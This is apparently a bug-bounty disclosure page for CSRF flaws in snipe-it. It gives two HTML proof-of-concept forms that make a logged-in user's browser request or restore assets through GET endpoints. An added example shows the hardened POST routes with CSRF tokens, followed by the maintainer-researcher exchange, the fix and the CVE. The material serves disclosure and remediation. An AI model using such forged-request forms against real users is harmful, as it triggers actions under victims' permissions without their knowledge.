Cross-Site Request Forgery (CSRF) in snipe/snipe-it

Valid

Reported on

Oct 4th 2021


Description

I found some low/medium-level CSRFs in the nice snipe-it application.

Proof of Concepts

Change the state of requestable assets:

// PoC.html

<html>
  <body>
  <!-- only hides the attacker page's path in the address bar; cosmetic -->
  <script>history.pushState('', '', '/')</script>
    <!-- no method attribute, so the form submits as a plain GET: Laravel's CSRF
         middleware does not check GET requests, and the victim's browser sends the
         session cookie with the top-level navigation. Replace {id} with the id of a
         requestable asset. -->
    <form action="https://develop.snipeitapp.com/account/request-asset/{id}">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Restore a hardware asset:

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <!-- same technique: a GET form needs no CSRF token. Replace {id} with the id of a
         deleted asset the victim is allowed to restore. -->
    <form action="https://develop.snipeitapp.com/hardware/{id}/restore">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
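The two PoCs work because both actions are reachable with a plain GET, and Laravel's VerifyCsrfToken middleware only verifies the token on non-reading methods (POST, PUT, PATCH, DELETE). The following is an added example, not snipe-it's routes/web.php and not the 84c73a fix; the controller classes, action names and route names are hypothetical placeholders. It shows the vulnerable route shape beside the hardened one, and the Blade form change that has to go with it.

```php
<?php
// Added example (not snipe-it's routes/web.php and not the 84c73a fix).
// HardwareController, AccountController and the route names are hypothetical.
use Illuminate\Support\Facades\Route;

// BEFORE (remove): state-changing actions reachable with a plain GET.
// VerifyCsrfToken skips GET/HEAD/OPTIONS, so a cross-site <form action="...">
// with the default GET method needs no _token. The victim's browser attaches
// the session cookie (also under Laravel's default SameSite=Lax, which still
// sends cookies on top-level GET navigations) and the handler runs with the
// victim's own permissions. The fine-grained permission check does not help,
// because the request really is the victim's.
Route::middleware(['auth'])->group(function () {
    Route::get('hardware/{assetId}/restore', [HardwareController::class, 'restore']);
    Route::get('account/request-asset/{assetId}', [AccountController::class, 'requestAsset']);
});

// AFTER: the same actions accept POST only. POST routes in routes/web.php sit
// inside the "web" middleware group and therefore pass through VerifyCsrfToken:
// a POST without a valid _token is rejected with HTTP 419, and a GET to the
// same URI now gets HTTP 405 because no GET route matches.
Route::middleware(['auth'])->group(function () {
    Route::post('hardware/{assetId}/restore', [HardwareController::class, 'restore'])
        ->name('hardware.restore');
    Route::post('account/request-asset/{assetId}', [AccountController::class, 'requestAsset'])
        ->name('account.request-asset');
});

// The legitimate form in the Blade view has to change with the route:
//
//   <form method="POST" action="{{ route('hardware.restore', $asset->id) }}">
//       @csrf   {{-- emits <input type="hidden" name="_token" value="..."> --}}
//       <button type="submit">Restore</button>
//   </form>
//
// Do not add these URIs to App\Http\Middleware\VerifyCsrfToken::$except; that
// would reopen the same hole with a cross-site POST form instead of a GET one.
```

To check a deployment, send a GET for one of these URIs with a valid session cookie (cookie name and host are whatever your instance uses): a patched instance answers 405, an unpatched one performs the action. A POST with the same cookie but no `_token` field should answer 419. Note that SameSite=Lax on the session cookie is not a defence for the GET variant, since a form submission is a top-level navigation; the method change plus the token is what closes it.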

We have contacted a member of the snipe/snipe-it team and are waiting to hear back 2 months ago
snipe
2 months ago

Maintainer


This really wouldn't apply here, since we have fine-grained permissions that wouldn't allow a logged in user to perform an action they weren't authorized to do anyway.

amammad modified their report
2 months ago
amammad
2 months ago

Researcher


The CSRF attack does not need any permission.

In this kind of attack, it is enough for a logged-in user with fine-grained permissions to go to the attacker's website or click a link.

amammad
2 months ago

Researcher


Believe me, I have reported nearly 200 CSRF vulnerabilities to many repositories. If you want more explanation, just tell me, my dear.

snipe
2 months ago

Maintainer


Please do not call me "dear". The logged in user would still have to have permission to execute the action that the form is requesting. It still has to talk to the server, and the server determines who has permission to do what.

snipe
2 months ago

Maintainer


Additionally, Laravel framework requires a CSRF token in order to process form requests, so I'm not sure how you'd even get anything other than a 500 error.

amammad
2 months ago

Researcher


I'm so sorry about "dear", I'm not a pro in English.

First, I want to be sure that you already know about CSRF attacks (excuse me for saying this).

A good reference:

https://portswigger.net/web-security/csrf

Well, if a user that already has permission to execute the action, or even the admin or superuser, goes to the attacker's website or clicks on a crafted link, then the action is sent to the server as that user, admin or superuser, because the request is sent to the server as the user who has the permission.

snipe validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
amammad
2 months ago

Researcher


Thanks for the validation. If you want to know more about my report, just tell me and I will create a video PoC.

If possible, tell me what I can call you next time?

Best regards.

snipe
2 months ago

Maintainer


No problem re: "dear" - but women in the US don't like to be called "dear" by strangers. It comes off as condescending.

I know what CSRFs are. This just doesn't seem very high risk, since the worst you can do is restore an asset that was deleted. In context, this isn't really that big of a risk.

We'll patch it anyway, but there's limited harm you could do.

snipe
2 months ago

Maintainer


Calling me by my name/handle would suffice, thanks for asking.

I should have a PR up shortly.

snipe
2 months ago

Maintainer


I have a PR up as a fix for this, but it will be on demo.snipeitapp.com (the master branch), not develop, which is considered unstable and not fit for production currently. The fix on master is still going through QA but should be out shortly.

snipe
2 months ago

Maintainer


This is now fixed on demo.snipeitapp.com. It will not appear on develop until the two branches are merged, which will not be for another few weeks, as develop is not stable and not meant for use in production under any circumstances.

snipe confirmed that a fix has been merged on 84c73a 2 months ago
snipe has been awarded the fix bounty
web.php#L40-L44 has been validated
Jamie Slome
a month ago

Admin


CVE published! 🎊